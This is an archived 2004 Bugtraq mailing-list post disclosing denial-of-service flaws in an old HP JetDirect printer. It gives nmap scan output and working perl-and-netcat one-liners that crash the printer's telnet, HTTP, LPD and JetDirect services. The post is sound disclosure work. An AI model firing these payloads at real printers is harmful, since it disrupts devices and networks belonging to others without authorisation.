[<prev] [next>] [day] [month] [year] [list]
Message-ID: <Pine.BSO.4.58.0410011253080.17995@voodoo.mediaservice.net>
Date: Fri, 1 Oct 2004 13:04:59 +0200 (CEST)
From: Marco Ivaldi <raptor@...eadbeef.info>
To: bugtraq@...urityfocus.com
Subject: Re: Promiscuous email printing in Canon imageRunner
> Try scanning the Ip address with nmap -A 10.0.0.1
Hello Bugtraq,
While we're talking about printers, some time ago i discovered by accident
some lame Denial of Service vulnerabilities in my HP JetDirect printer
(tested on J3111A, firmware version G.05.35 -- pretty old). Not sure if
they can be reproduced on newer models/firmwares.
Here we go:
root@...ron:~# nmap -A x.x.x.x
Interesting ports on printer.mediaservice.pri (x.x.x.x):
(The 1655 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE VERSION
23/tcp open telnet HP JetDirect printer telnetd
80/tcp open http?
515/tcp open printer?
9100/tcp open jetdirect?
Device type: printer|print server
Running: HP embedded
OS details: HP printer w/JetDirect card
# telnet -> crash of all network services
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 23
# http -> crash of all network services with funny stack dump on paper! ;)
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 80
# printer -> the printer switches indefinitely between data recv and ready
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 515
# jetdirect -> prints ABCD... and leaves the printer in "unstable" status
root@...ron:~# perl -e 'print "ABCD"x666 . "\n"' | nc x.x.x.x 9100
I've scanned the funny stack dump printed on paper and put it on-line at:
http://www.0xdeadbeef.info/stuff/hp-crash.jpg
You should also take a look to Paul Szabo's excellent web resources on
PostScript, PJL/PCL, and secure HP printers configuration:
http://www.maths.usyd.edu.au:8000/u/psz/ps.html
Cheers,
--
Marco Ivaldi
Antifork Research, Inc. http://0xdeadbeef.info/
3B05 C9C5 A2DE C3D7 4233 0394 EF85 2008 DBFD B707
Powered by blists - more mailing lists